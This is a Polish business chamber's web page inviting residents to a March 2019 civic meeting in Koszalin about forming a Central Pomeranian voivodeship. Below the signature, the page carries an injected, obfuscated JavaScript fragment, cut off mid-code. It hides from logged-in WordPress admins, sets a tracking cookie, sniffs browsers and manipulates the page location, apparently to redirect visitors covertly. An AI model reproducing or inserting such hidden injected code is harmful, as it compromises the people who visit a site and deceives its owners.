Zaproszenie Na Spotkanie Obywatelskie Pn. „Pomorze Środkowe Wczoraj – Dziś – Jutro” | Północna Izba Gospodarcza w Koszalinie
Szanowni Państwo!

W imieniu Inicjatywnej Grupy Utworzenia Województwa Środkowopomorskiego zawiązanej przez organizacje zrzeszające przedsiębiorców, zapraszam Państwa na spotkanie obywatelskie pn. „Pomorze Środkowe wczoraj – dziś – jutro”, które odbędzie się w dniu 26 marca 2019 roku w godzinach 17.00 – 19.00 w Sali kinowej Koszalińskiej Biblioteki Publicznej. Podczas spotkania dokonamy podsumowania dotychczasowej działań naszej grupy na rzecz utworzenia Województwa Środkowopomorskiego.

Przedmiotowe spotkanie będzie też doskonałą okazją do dyskusji w gronie zgromadzonych mieszkańców regionu zainteresowanych jego rozwojem, na temat dalszych wspólnych kroków niezbędnych do podjęcia, aby Województwo Środkowopomorskie stało się faktem. Prosimy o potwierdzenie obecności mailowo na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Z poważaniem

Roman Biłas
Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m